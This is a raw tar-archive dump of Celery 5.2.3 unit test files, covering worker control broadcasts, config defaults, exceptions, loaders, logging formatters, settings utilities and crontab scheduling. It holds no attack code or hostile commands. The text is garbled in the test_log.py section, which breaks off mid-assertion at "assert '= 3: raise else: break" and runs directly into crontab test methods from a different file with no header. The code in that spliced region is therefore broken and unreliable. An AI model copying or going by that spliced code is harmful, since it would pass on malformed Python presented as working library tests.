2 @pytest.mark.parametrize('attr', [ '__author__', '__contact__', '__homepage__', '__docformat__', ]) def test_meta(attr): assert getattr(celery, attr, None) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_control.py0000664000175000017500000004256300000000000020002 0ustar00asifasif00000000000000from unittest.mock import Mock import pytest from celery import uuid from celery.app import control from celery.exceptions import DuplicateNodenameWarning from celery.utils.collections import LimitedSet def _info_for_commandclass(type_): from celery.worker.control import Panel return [ (name, info) for name, info in Panel.meta.items() if info.type == type_ ] def test_client_implements_all_commands(app): commands = _info_for_commandclass('control') assert commands for name, info in commands: assert getattr(app.control, name) def test_inspect_implements_all_commands(app): inspect = app.control.inspect() commands = _info_for_commandclass('inspect') assert commands for name, info in commands: if info.type == 'inspect': assert getattr(inspect, name) class test_flatten_reply: def test_flatten_reply(self): reply = [ {'foo@example.com': {'hello': 10}}, {'foo@example.com': {'hello': 20}}, {'bar@example.com': {'hello': 30}} ] with pytest.warns(DuplicateNodenameWarning) as w: nodes = control.flatten_reply(reply) assert 'Received multiple replies from node name: {}.'.format( next(iter(reply[0]))) in str(w[0].message.args[0]) assert 'foo@example.com' in nodes assert 'bar@example.com' in nodes class test_inspect: def setup(self): self.app.control.broadcast = Mock(name='broadcast') self.app.control.broadcast.return_value = {} self.inspect = self.app.control.inspect() def test_prepare_reply(self): reply = self.inspect._prepare([ {'w1': {'ok': 1}}, {'w2': {'ok': 1}}, ]) assert reply == { 'w1': {'ok': 1}, 'w2': {'ok': 1}, } i = self.app.control.inspect(destination='w1') assert i._prepare([{'w1': {'ok': 1}}]) == {'ok': 1} def assert_broadcast_called(self, command, destination=None, callback=None, connection=None, limit=None, timeout=None, reply=True, pattern=None, matcher=None, **arguments): self.app.control.broadcast.assert_called_with( command, arguments=arguments, destination=destination or self.inspect.destination, pattern=pattern or self.inspect.pattern, matcher=matcher or self.inspect.destination, callback=callback or self.inspect.callback, connection=connection or self.inspect.connection, limit=limit if limit is not None else self.inspect.limit, timeout=timeout if timeout is not None else self.inspect.timeout, reply=reply, ) def test_active(self): self.inspect.active() self.assert_broadcast_called('active', safe=None) def test_active_safe(self): self.inspect.active(safe=True) self.assert_broadcast_called('active', safe=True) def test_clock(self): self.inspect.clock() self.assert_broadcast_called('clock') def test_conf(self): self.inspect.conf() self.assert_broadcast_called('conf', with_defaults=False) def test_conf__with_defaults(self): self.inspect.conf(with_defaults=True) self.assert_broadcast_called('conf', with_defaults=True) def test_hello(self): self.inspect.hello('george@vandelay.com') self.assert_broadcast_called( 'hello', from_node='george@vandelay.com', revoked=None) def test_hello__with_revoked(self): revoked = LimitedSet(100) for i in range(100): revoked.add(f'id{i}') self.inspect.hello('george@vandelay.com', revoked=revoked._data) self.assert_broadcast_called( 'hello', from_node='george@vandelay.com', revoked=revoked._data) def test_memsample(self): self.inspect.memsample() self.assert_broadcast_called('memsample') def test_memdump(self): self.inspect.memdump() self.assert_broadcast_called('memdump', samples=10) def test_memdump__samples_specified(self): self.inspect.memdump(samples=303) self.assert_broadcast_called('memdump', samples=303) def test_objgraph(self): self.inspect.objgraph() self.assert_broadcast_called( 'objgraph', num=200, type='Request', max_depth=10) def test_scheduled(self): self.inspect.scheduled() self.assert_broadcast_called('scheduled') def test_reserved(self): self.inspect.reserved() self.assert_broadcast_called('reserved') def test_stats(self): self.inspect.stats() self.assert_broadcast_called('stats') def test_revoked(self): self.inspect.revoked() self.assert_broadcast_called('revoked') def test_registered(self): self.inspect.registered() self.assert_broadcast_called('registered', taskinfoitems=()) def test_registered__taskinfoitems(self): self.inspect.registered('rate_limit', 'time_limit') self.assert_broadcast_called( 'registered', taskinfoitems=('rate_limit', 'time_limit'), ) def test_ping(self): self.inspect.ping() self.assert_broadcast_called('ping') def test_ping_matcher_pattern(self): orig_inspect = self.inspect self.inspect = self.app.control.inspect(pattern=".*", matcher="pcre") self.inspect.ping() try: self.assert_broadcast_called('ping', pattern=".*", matcher="pcre") except AssertionError as e: self.inspect = orig_inspect raise e def test_active_queues(self): self.inspect.active_queues() self.assert_broadcast_called('active_queues') def test_query_task(self): self.inspect.query_task('foo', 'bar') self.assert_broadcast_called('query_task', ids=('foo', 'bar')) def test_query_task__compat_single_list_argument(self): self.inspect.query_task(['foo', 'bar']) self.assert_broadcast_called('query_task', ids=['foo', 'bar']) def test_query_task__scalar(self): self.inspect.query_task('foo') self.assert_broadcast_called('query_task', ids=('foo',)) def test_report(self): self.inspect.report() self.assert_broadcast_called('report') class test_Control_broadcast: def setup(self): self.app.control.mailbox = Mock(name='mailbox') def test_broadcast(self): self.app.control.broadcast('foobarbaz', arguments={'foo': 2}) self.app.control.mailbox.assert_called() self.app.control.mailbox()._broadcast.assert_called_with( 'foobarbaz', {'foo': 2}, None, False, 1.0, None, None, channel=None, ) def test_broadcast_limit(self): self.app.control.broadcast( 'foobarbaz1', arguments=None, limit=None, destination=[1, 2, 3], ) self.app.control.mailbox.assert_called() self.app.control.mailbox()._broadcast.assert_called_with( 'foobarbaz1', {}, [1, 2, 3], False, 1.0, None, None, channel=None, ) class test_Control: def setup(self): self.app.control.broadcast = Mock(name='broadcast') self.app.control.broadcast.return_value = {} @self.app.task(shared=False) def mytask(): pass self.mytask = mytask def assert_control_called_with_args(self, name, destination=None, _options=None, **args): self.app.control.broadcast.assert_called_with( name, destination=destination, arguments=args, **_options or {}) def test_serializer(self): self.app.conf['task_serializer'] = 'test' self.app.conf['accept_content'] = ['test'] assert control.Control(self.app).mailbox.serializer == 'test' assert control.Control(self.app).mailbox.accept == ['test'] def test_purge(self): self.app.amqp.TaskConsumer = Mock(name='TaskConsumer') self.app.control.purge() self.app.amqp.TaskConsumer().purge.assert_called_with() def test_rate_limit(self): self.app.control.rate_limit(self.mytask.name, '100/m') self.assert_control_called_with_args( 'rate_limit', destination=None, task_name=self.mytask.name, rate_limit='100/m', ) def test_rate_limit__with_destination(self): self.app.control.rate_limit( self.mytask.name, '100/m', 'a@w.com', limit=100) self.assert_control_called_with_args( 'rate_limit', destination='a@w.com', task_name=self.mytask.name, rate_limit='100/m', _options={'limit': 100}, ) def test_time_limit(self): self.app.control.time_limit(self.mytask.name, soft=10, hard=20) self.assert_control_called_with_args( 'time_limit', destination=None, task_name=self.mytask.name, soft=10, hard=20, ) def test_time_limit__with_destination(self): self.app.control.time_limit( self.mytask.name, soft=10, hard=20, destination='a@q.com', limit=99, ) self.assert_control_called_with_args( 'time_limit', destination='a@q.com', task_name=self.mytask.name, soft=10, hard=20, _options={'limit': 99}, ) def test_add_consumer(self): self.app.control.add_consumer('foo') self.assert_control_called_with_args( 'add_consumer', destination=None, queue='foo', exchange=None, exchange_type='direct', routing_key=None, ) def test_add_consumer__with_options_and_dest(self): self.app.control.add_consumer( 'foo', 'ex', 'topic', 'rkey', destination='a@q.com', limit=78) self.assert_control_called_with_args( 'add_consumer', destination='a@q.com', queue='foo', exchange='ex', exchange_type='topic', routing_key='rkey', _options={'limit': 78}, ) def test_cancel_consumer(self): self.app.control.cancel_consumer('foo') self.assert_control_called_with_args( 'cancel_consumer', destination=None, queue='foo', ) def test_cancel_consumer__with_destination(self): self.app.control.cancel_consumer( 'foo', destination='w1@q.com', limit=3) self.assert_control_called_with_args( 'cancel_consumer', destination='w1@q.com', queue='foo', _options={'limit': 3}, ) def test_shutdown(self): self.app.control.shutdown() self.assert_control_called_with_args('shutdown', destination=None) def test_shutdown__with_destination(self): self.app.control.shutdown(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'shutdown', destination='a@q.com', _options={'limit': 3}) def test_heartbeat(self): self.app.control.heartbeat() self.assert_control_called_with_args('heartbeat', destination=None) def test_heartbeat__with_destination(self): self.app.control.heartbeat(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'heartbeat', destination='a@q.com', _options={'limit': 3}) def test_pool_restart(self): self.app.control.pool_restart() self.assert_control_called_with_args( 'pool_restart', destination=None, modules=None, reload=False, reloader=None) def test_terminate(self): self.app.control.revoke = Mock(name='revoke') self.app.control.terminate('124') self.app.control.revoke.assert_called_with( '124', destination=None, terminate=True, signal=control.TERM_SIGNAME, ) def test_enable_events(self): self.app.control.enable_events() self.assert_control_called_with_args('enable_events', destination=None) def test_enable_events_with_destination(self): self.app.control.enable_events(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'enable_events', destination='a@q.com', _options={'limit': 3}) def test_disable_events(self): self.app.control.disable_events() self.assert_control_called_with_args( 'disable_events', destination=None) def test_disable_events_with_destination(self): self.app.control.disable_events(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'disable_events', destination='a@q.com', _options={'limit': 3}) def test_ping(self): self.app.control.ping() self.assert_control_called_with_args( 'ping', destination=None, _options={'timeout': 1.0, 'reply': True}) def test_ping_with_destination(self): self.app.control.ping(destination='a@q.com', limit=3) self.assert_control_called_with_args( 'ping', destination='a@q.com', _options={ 'limit': 3, 'timeout': 1.0, 'reply': True, }) def test_revoke(self): self.app.control.revoke('foozbaaz') self.assert_control_called_with_args( 'revoke', destination=None, task_id='foozbaaz', signal=control.TERM_SIGNAME, terminate=False, ) def test_revoke__with_options(self): self.app.control.revoke( 'foozbaaz', destination='a@q.com', terminate=True, signal='KILL', limit=404, ) self.assert_control_called_with_args( 'revoke', destination='a@q.com', task_id='foozbaaz', signal='KILL', terminate=True, _options={'limit': 404}, ) def test_election(self): self.app.control.election('some_id', 'topic', 'action') self.assert_control_called_with_args( 'election', destination=None, topic='topic', action='action', id='some_id', _options={'connection': None}, ) def test_autoscale(self): self.app.control.autoscale(300, 10) self.assert_control_called_with_args( 'autoscale', max=300, min=10, destination=None) def test_autoscale__with_options(self): self.app.control.autoscale(300, 10, destination='a@q.com', limit=39) self.assert_control_called_with_args( 'autoscale', max=300, min=10, destination='a@q.com', _options={'limit': 39} ) def test_pool_grow(self): self.app.control.pool_grow(2) self.assert_control_called_with_args( 'pool_grow', n=2, destination=None) def test_pool_grow__with_options(self): self.app.control.pool_grow(2, destination='a@q.com', limit=39) self.assert_control_called_with_args( 'pool_grow', n=2, destination='a@q.com', _options={'limit': 39} ) def test_pool_shrink(self): self.app.control.pool_shrink(2) self.assert_control_called_with_args( 'pool_shrink', n=2, destination=None) def test_pool_shrink__with_options(self): self.app.control.pool_shrink(2, destination='a@q.com', limit=39) self.assert_control_called_with_args( 'pool_shrink', n=2, destination='a@q.com', _options={'limit': 39} ) def test_revoke_from_result(self): self.app.control.revoke = Mock(name='revoke') self.app.AsyncResult('foozbazzbar').revoke() self.app.control.revoke.assert_called_with( 'foozbazzbar', connection=None, reply=False, signal=None, terminate=False, timeout=None) def test_revoke_from_resultset(self): self.app.control.revoke = Mock(name='revoke') uuids = [uuid() for _ in range(10)] r = self.app.GroupResult( uuid(), [self.app.AsyncResult(x) for x in uuids]) r.revoke() self.app.control.revoke.assert_called_with( uuids, connection=None, reply=False, signal=None, terminate=False, timeout=None) def test_after_fork_clears_mailbox_pool(self): amqp = Mock(name='amqp') self.app.amqp = amqp closed_pool = Mock(name='closed pool') amqp.producer_pool = closed_pool assert closed_pool is self.app.control.mailbox.producer_pool self.app.control._after_fork() new_pool = Mock(name='new pool') amqp.producer_pool = new_pool assert new_pool is self.app.control.mailbox.producer_pool def test_control_exchange__default(self): c = control.Control(self.app) assert c.mailbox.namespace == 'celery' def test_control_exchange__setting(self): self.app.conf.control_exchange = 'test_exchange' c = control.Control(self.app) assert c.mailbox.namespace == 'test_exchange' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_defaults.py0000664000175000017500000000313300000000000020117 0ustar00asifasif00000000000000import sys from importlib import import_module from celery.app.defaults import (_OLD_DEFAULTS, _OLD_SETTING_KEYS, _TO_NEW_KEY, _TO_OLD_KEY, DEFAULTS, NAMESPACES, SETTING_KEYS) class test_defaults: def setup(self): self._prev = sys.modules.pop('celery.app.defaults', None) def teardown(self): if self._prev: sys.modules['celery.app.defaults'] = self._prev def test_option_repr(self): assert repr(NAMESPACES['broker']['url']) def test_any(self): val = object() assert self.defaults.Option.typemap['any'](val) is val def test_compat_indices(self): assert not any(key.isupper() for key in DEFAULTS) assert not any(key.islower() for key in _OLD_DEFAULTS) assert not any(key.isupper() for key in _TO_OLD_KEY) assert not any(key.islower() for key in _TO_NEW_KEY) assert not any(key.isupper() for key in SETTING_KEYS) assert not any(key.islower() for key in _OLD_SETTING_KEYS) assert not any(value.isupper() for value in _TO_NEW_KEY.values()) assert not any(value.islower() for value in _TO_OLD_KEY.values()) for key in _TO_NEW_KEY: assert key in _OLD_SETTING_KEYS for key in _TO_OLD_KEY: assert key in SETTING_KEYS def test_find(self): find = self.defaults.find assert find('default_queue')[2].default == 'celery' assert find('task_default_exchange')[2] is None @property def defaults(self): return import_module('celery.app.defaults') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_exceptions.py0000664000175000017500000000144100000000000020471 0ustar00asifasif00000000000000import pickle from datetime import datetime from celery.exceptions import Reject, Retry class test_Retry: def test_when_datetime(self): x = Retry('foo', KeyError(), when=datetime.utcnow()) assert x.humanize() def test_pickleable(self): x = Retry('foo', KeyError(), when=datetime.utcnow()) y = pickle.loads(pickle.dumps(x)) assert x.message == y.message assert repr(x.exc) == repr(y.exc) assert x.when == y.when class test_Reject: def test_attrs(self): x = Reject('foo', requeue=True) assert x.reason == 'foo' assert x.requeue def test_repr(self): assert repr(Reject('foo', True)) def test_pickleable(self): x = Retry('foo', True) assert pickle.loads(pickle.dumps(x)) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/app/test_loaders.py0000664000175000017500000002115100000000000017741 0ustar00asifasif00000000000000import os import sys import warnings from unittest.mock import Mock, patch import pytest from celery import loaders from celery.exceptions import NotConfigured from celery.loaders import base, default from celery.loaders.app import AppLoader from celery.utils.imports import NotAPackage class DummyLoader(base.BaseLoader): def read_configuration(self): return {'foo': 'bar', 'imports': ('os', 'sys')} class test_loaders: def test_get_loader_cls(self): assert loaders.get_loader_cls('default') is default.Loader class test_LoaderBase: message_options = {'subject': 'Subject', 'body': 'Body', 'sender': 'x@x.com', 'to': 'y@x.com'} server_options = {'host': 'smtp.x.com', 'port': 1234, 'user': 'x', 'password': 'qwerty', 'timeout': 3} def setup(self): self.loader = DummyLoader(app=self.app) def test_handlers_pass(self): self.loader.on_task_init('foo.task', 'feedface-cafebabe') self.loader.on_worker_init() def test_now(self): assert self.loader.now(utc=True) assert self.loader.now(utc=False) def test_read_configuration_no_env(self): assert base.BaseLoader(app=self.app).read_configuration( 'FOO_X_S_WE_WQ_Q_WE') is None def test_autodiscovery(self): with patch('celery.loaders.base.autodiscover_tasks') as auto: auto.return_value = [Mock()] auto.return_value[0].__name__ = 'moo' self.loader.autodiscover_tasks(['A', 'B']) assert 'moo' in self.loader.task_modules self.loader.task_modules.discard('moo') def test_import_task_module(self): assert sys == self.loader.import_task_module('sys') def test_init_worker_process(self): self.loader.on_worker_process_init() m = self.loader.on_worker_process_init = Mock() self.loader.init_worker_process() m.assert_called_with() def test_config_from_object_module(self): self.loader.import_from_cwd = Mock(return_value={ "override_backends": {"db": "custom.backend.module"}, }) self.loader.config_from_object('module_name') self.loader.import_from_cwd.assert_called_with('module_name') assert self.loader.override_backends == {"db": "custom.backend.module"} def test_conf_property(self): assert self.loader.conf['foo'] == 'bar' assert self.loader._conf['foo'] == 'bar' assert self.loader.conf['foo'] == 'bar' def test_import_default_modules(self): def modnames(l): return [m.__name__ for m in l] self.app.conf.imports = ('os', 'sys') assert (sorted(modnames(self.loader.import_default_modules())) == sorted(modnames([os, sys]))) def test_import_default_modules_with_exception(self): """ Make sure exceptions are not silenced since this step is prior to setup logging. """ def trigger_exception(**kwargs): raise ImportError('Dummy ImportError') from celery.signals import import_modules x = import_modules.connect(trigger_exception) self.app.conf.imports = ('os', 'sys') with pytest.raises(ImportError): self.loader.import_default_modules() import_modules.disconnect(x) def test_import_from_cwd_custom_imp(self): imp = Mock(name='imp') self.loader.import_from_cwd('foo', imp=imp) imp.assert_called() def test_cmdline_config_ValueError(self): with pytest.raises(ValueError): self.loader.cmdline_config_parser(['broker.port=foobar']) class test_DefaultLoader: @patch('celery.loaders.base.find_module') def test_read_configuration_not_a_package(self, find_module): find_module.side_effect = NotAPackage() l = default.Loader(app=self.app) with pytest.raises(NotAPackage): l.read_configuration(fail_silently=False) @patch('celery.loaders.base.find_module') @pytest.mark.patched_environ('CELERY_CONFIG_MODULE', 'celeryconfig.py') def test_read_configuration_py_in_name(self, find_module, environ): find_module.side_effect = NotAPackage() l = default.Loader(app=self.app) with pytest.raises(NotAPackage): l.read_configuration(fail_silently=False) @patch('celery.loaders.base.find_module') def test_read_configuration_importerror(self, find_module): default.C_WNOCONF = True find_module.side_effect = ImportError() l = default.Loader(app=self.app) with pytest.warns(NotConfigured): l.read_configuration(fail_silently=True) default.C_WNOCONF = False l.read_configuration(fail_silently=True) def test_read_configuration(self): from types import ModuleType class ConfigModule(ModuleType): pass configname = os.environ.get('CELERY_CONFIG_MODULE') or 'celeryconfig' celeryconfig = ConfigModule(configname) celeryconfig.imports = ('os', 'sys') prevconfig = sys.modules.get(configname) sys.modules[configname] = celeryconfig try: l = default.Loader(app=self.app) l.find_module = Mock(name='find_module') settings = l.read_configuration(fail_silently=False) assert settings.imports == ('os', 'sys') settings = l.read_configuration(fail_silently=False) assert settings.imports == ('os', 'sys') l.on_worker_init() finally: if prevconfig: sys.modules[configname] = prevconfig def test_read_configuration_ImportError(self): sentinel = object() prev, os.environ['CELERY_CONFIG_MODULE'] = ( os.environ.get('CELERY_CONFIG_MODULE', sentinel), 'daweqew.dweqw', ) try: l = default.Loader(app=self.app) with pytest.raises(ImportError): l.read_configuration(fail_silently=False) l.read_configuration(fail_silently=True) finally: if prev is not sentinel: os.environ['CELERY_CONFIG_MODULE'] = prev else: os.environ.pop('CELERY_CONFIG_MODULE', None) def test_import_from_cwd(self): l = default.Loader(app=self.app) old_path = list(sys.path) try: sys.path.remove(os.getcwd()) except ValueError: pass celery = sys.modules.pop('celery', None) sys.modules.pop('celery.local', None) try: assert l.import_from_cwd('celery') sys.modules.pop('celery', None) sys.modules.pop('celery.local', None) sys.path.insert(0, os.getcwd()) assert l.import_from_cwd('celery') finally: sys.path = old_path sys.modules['celery'] = celery def test_unconfigured_settings(self): context_executed = [False] class _Loader(default.Loader): def find_module(self, name): raise ImportError(name) with warnings.catch_warnings(record=True): l = _Loader(app=self.app) assert not l.configured context_executed[0] = True assert context_executed[0] class test_AppLoader: def setup(self): self.loader = AppLoader(app=self.app) def test_on_worker_init(self): self.app.conf.imports = ('subprocess',) sys.modules.pop('subprocess', None) self.loader.init_worker() assert 'subprocess' in sys.modules class test_autodiscovery: def test_autodiscover_tasks(self): base._RACE_PROTECTION = True try: base.autodiscover_tasks(['foo']) finally: base._RACE_PROTECTION = False with patch('celery.loaders.base.find_related_module') as frm: base.autodiscover_tasks(['foo']) frm.assert_called() def test_find_related_module(self): with patch('importlib.import_module') as imp: imp.return_value = Mock() imp.return_value.__path__ = 'foo' assert base.find_related_module('bar', 'tasks').__path__ == 'foo' imp.assert_any_call('bar') imp.assert_any_call('bar.tasks') imp.reset_mock() assert base.find_related_module('bar', None).__path__ == 'foo' imp.assert_called_once_with('bar') imp.side_effect = ImportError() with pytest.raises(ImportError): base.find_related_module('bar', 'tasks') assert base.find_related_module('bar.foo', 'tasks') is None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/app/test_log.py0000664000175000017500000002706200000000000017100 0ustar00asifasif00000000000000import logging import sys from collections import defaultdict from io import StringIO from tempfile import mktemp from unittest.mock import Mock, patch import pytest from celery import signals, uuid from celery.app.log import TaskFormatter from celery.utils.log import (ColorFormatter, LoggingProxy, get_logger, get_task_logger, in_sighandler) from celery.utils.log import logger as base_logger from celery.utils.log import logger_isa, task_logger from t.unit import conftest class test_TaskFormatter: def test_no_task(self): class Record: msg = 'hello world' levelname = 'info' exc_text = exc_info = None stack_info = None def getMessage(self): return self.msg record = Record() x = TaskFormatter() x.format(record) assert record.task_name == '???' assert record.task_id == '???' class test_logger_isa: def test_isa(self): x = get_task_logger('Z1george') assert logger_isa(x, task_logger) prev_x, x.parent = x.parent, None try: assert not logger_isa(x, task_logger) finally: x.parent = prev_x y = get_task_logger('Z1elaine') y.parent = x assert logger_isa(y, task_logger) assert logger_isa(y, x) assert logger_isa(y, y) z = get_task_logger('Z1jerry') z.parent = y assert logger_isa(z, task_logger) assert logger_isa(z, y) assert logger_isa(z, x) assert logger_isa(z, z) def test_recursive(self): x = get_task_logger('X1foo') prev, x.parent = x.parent, x try: with pytest.raises(RuntimeError): logger_isa(x, task_logger) finally: x.parent = prev y = get_task_logger('X2foo') z = get_task_logger('X2foo') prev_y, y.parent = y.parent, z try: prev_z, z.parent = z.parent, y try: with pytest.raises(RuntimeError): logger_isa(y, task_logger) finally: z.parent = prev_z finally: y.parent = prev_y class test_ColorFormatter: @patch('celery.utils.log.safe_str') @patch('logging.Formatter.formatException') def test_formatException_not_string(self, fe, safe_str): x = ColorFormatter() value = KeyError() fe.return_value = value assert x.formatException(value) is value fe.assert_called() safe_str.assert_not_called() @patch('logging.Formatter.formatException') @patch('celery.utils.log.safe_str') def test_formatException_bytes(self, safe_str, fe): x = ColorFormatter() fe.return_value = b'HELLO' try: raise Exception() except Exception: assert x.formatException(sys.exc_info()) @patch('logging.Formatter.format') def test_format_object(self, _format): x = ColorFormatter() x.use_color = True record = Mock() record.levelname = 'ERROR' record.msg = object() assert x.format(record) @patch('celery.utils.log.safe_str') def test_format_raises(self, safe_str): x = ColorFormatter() def on_safe_str(s): try: raise ValueError('foo') finally: safe_str.side_effect = None safe_str.side_effect = on_safe_str class Record: levelname = 'ERROR' msg = 'HELLO' exc_info = 1 exc_text = 'error text' stack_info = None def __str__(self): return on_safe_str('') def getMessage(self): return self.msg record = Record() safe_str.return_value = record msg = x.format(record) assert '= 3: raise else: break def test_every_minute_execution_is_due(self): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) self.assert_relativedelta(self.every_minute, last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def assert_relativedelta(self, due, last_ran): try: from dateutil.relativedelta import relativedelta except ImportError: return l1, d1, n1 = due.remaining_delta(last_ran) l2, d2, n2 = due.remaining_delta(last_ran, ffwd=relativedelta) if not isinstance(d1, relativedelta): assert l1 == l2 for field, value in d1._fields().items(): assert getattr(d1, field) == value assert not d2.years assert not d2.months assert not d2.days assert not d2.leapdays assert not d2.hours assert not d2.minutes assert not d2.seconds assert not d2.microseconds def test_every_minute_execution_is_not_due(self): last_ran = self.now - timedelta(seconds=self.now.second) due, remaining = self.every_minute.is_due(last_ran) assert not due self.seconds_almost_equal(remaining, self.next_minute, 1) def test_execution_is_due_on_saturday(self): # 29th of May 2010 is a saturday with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 29, 10, 30)): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def test_execution_is_due_on_sunday(self): # 30th of May 2010 is a sunday with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 30, 10, 30)): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def test_execution_is_due_on_monday(self): # 31st of May 2010 is a monday with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 31, 10, 30)): last_ran = self.now - timedelta(seconds=61) due, remaining = self.every_minute.is_due(last_ran) assert due self.seconds_almost_equal(remaining, self.next_minute, 1) def test_every_hour_execution_is_due(self): with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 10, 10, 30)): due, remaining = self.hourly.is_due(datetime(2010, 5, 10, 6, 30)) assert due assert remaining == 60 * 60 def test_every_hour_execution_is_not_due(self): with patch_crontab_nowfun(self.hourly, datetime(2010, 5, 10, 10, 29)): due, remaining = self.hourly.is_due(datetime(2010, 5, 10, 9, 30)) assert not due assert remaining == 60 def test_first_quarter_execution_is_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 15)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 6, 30), ) assert due assert remaining == 15 * 60 def test_second_quarter_execution_is_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 30)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 6, 30), ) assert due assert remaining == 15 * 60 def test_first_quarter_execution_is_not_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 14)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 10, 0), ) assert not due assert remaining == 60 def test_second_quarter_execution_is_not_due(self): with patch_crontab_nowfun( self.quarterly, datetime(2010, 5, 10, 10, 29)): due, remaining = self.quarterly.is_due( datetime(2010, 5, 10, 10, 15), ) assert not due assert remaining == 60 def test_daily_execution_is_due(self): with patch_crontab_nowfun(self.daily, datetime(2010, 5, 10, 7, 30)): due, remaining = self.daily.is_due(datetime(2010, 5, 9, 7, 30)) assert due assert remaining == 24 * 60 * 60 def test_daily_execution_is_not_due(self): with patch_crontab_nowfun(self.daily, datetime(2010, 5, 10, 10, 30)): due, remaining = self.daily.is_due(datetime(2010, 5, 10, 7, 30)) assert not due assert remaining == 21 * 60 * 60 def test_weekly_execution_is_due(self): with patch_crontab_nowfun(self.weekly, datetime(2010, 5, 6, 7, 30)): due, remaining = self.weekly.is_due(datetime(2010, 4, 30, 7, 30)) assert due assert remaining == 7 * 24 * 60 * 60 def test_weekly_execution_is_not_due(self): with patch_crontab_nowfun(self.weekly, datetime(2010, 5, 7, 10, 30)): due, remaining = self.weekly.is_due(datetime(2010, 5, 6, 7, 30)) assert not due assert remaining == 6 * 24 * 60 * 60 - 3 * 60 * 60 def test_monthly_execution_is_due(self): with patch_crontab_nowfun(self.monthly, datetime(2010, 5, 13, 7, 30)): due, remaining = self.monthly.is_due(datetime(2010, 4, 8, 7, 30)) assert due assert remaining == 28 * 24 * 60 * 60 def test_monthly_execution_is_not_due(self): with patch_crontab_nowfun(self.monthly, datetime(2010, 5, 9, 10, 30)): due, remaining = self.monthly.is_due(datetime(2010, 4, 8, 7, 30)) assert not due assert remaining == 4 * 24 * 60 * 60 - 3 * 60 * 60 def test_monthly_moy_execution_is_due(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2014, 2, 26, 22, 0)): due, remaining = self.monthly_moy.is_due( datetime(2013, 7, 4, 10, 0), ) assert due assert remaining == 60.0 @pytest.mark.skip('TODO: unstable test') def test_monthly_moy_execution_is_not_due(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2013, 6, 28, 14, 30)): due, remaining = self.monthly_moy.is_due( datetime(2013, 6, 28, 22, 14), ) assert not due attempt = ( time.mktime(datetime(2014, 2, 26, 22, 0).timetuple()) - time.mktime(datetime(2013, 6, 28, 14, 30).timetuple()) - 60 * 60 ) assert remaining == attempt def test_monthly_moy_execution_is_due2(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2014, 2, 26, 22, 0)): due, remaining = self.monthly_moy.is_due( datetime(2013, 2, 28, 10, 0), ) assert due assert remaining == 60.0 def test_monthly_moy_execution_is_not_due2(self): with patch_crontab_nowfun( self.monthly_moy, datetime(2014, 2, 26, 21, 0)): due, remaining = self.monthly_moy.is_due( datetime(2013, 6, 28, 22, 14), ) assert not due attempt = 60 * 60 assert remaining == attempt def test_yearly_execution_is_due(self): with patch_crontab_nowfun(self.yearly, datetime(2010, 3, 11, 7, 30)): due, remaining = self.yearly.is_due(datetime(2009, 3, 12, 7, 30)) assert due assert remaining == 364 * 24 * 60 * 60 def test_yearly_execution_is_not_due(self): with patch_crontab_nowfun(self.yearly, datetime(2010, 3, 7, 10, 30)): due, remaining = self.yearly.is_due(datetime(2009, 3, 12, 7, 30)) assert not due assert remaining == 4 * 24 * 60 * 60 - 3 * 60 * 60 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/app/test_utils.py0000664000175000017500000000337600000000000017461 0ustar00asifasif00000000000000from collections.abc import Mapping, MutableMapping from unittest.mock import Mock from celery.app.utils import Settings, bugreport, filter_hidden_settings class test_Settings: def test_is_mapping(self): """Settings should be a collections.Mapping""" assert issubclass(Settings, Mapping) def test_is_mutable_mapping(self): """Settings should be a collections.MutableMapping""" assert issubclass(Settings, MutableMapping) def test_find(self): assert self.app.conf.find_option('always_eager') def test_get_by_parts(self): self.app.conf.task_do_this_and_that = 303 assert self.app.conf.get_by_parts( 'task', 'do', 'this', 'and', 'that') == 303 def test_find_value_for_key(self): assert self.app.conf.find_value_for_key( 'always_eager') is False def test_table(self): assert self.app.conf.table(with_defaults=True) assert self.app.conf.table(with_defaults=False) assert self.app.conf.table(censored=False) assert self.app.conf.table(censored=True) class test_filter_hidden_settings: def test_handles_non_string_keys(self): """filter_hidden_settings shouldn't raise an exception when handling mappings with non-string keys""" conf = { 'STRING_KEY': 'VALUE1', ('NON', 'STRING', 'KEY'): 'VALUE2', 'STRING_KEY2': { 'STRING_KEY3': 1, ('NON', 'STRING', 'KEY', '2'): 2 }, } filter_hidden_settings(conf) class test_bugreport: def test_no_conn_driver_info(self): self.app.connection = Mock() conn = self.app.connection.return_value = Mock() conn.transport = None bugreport(self.app) ././@PaxHeader0000000000000000000000000000003400000000000011452 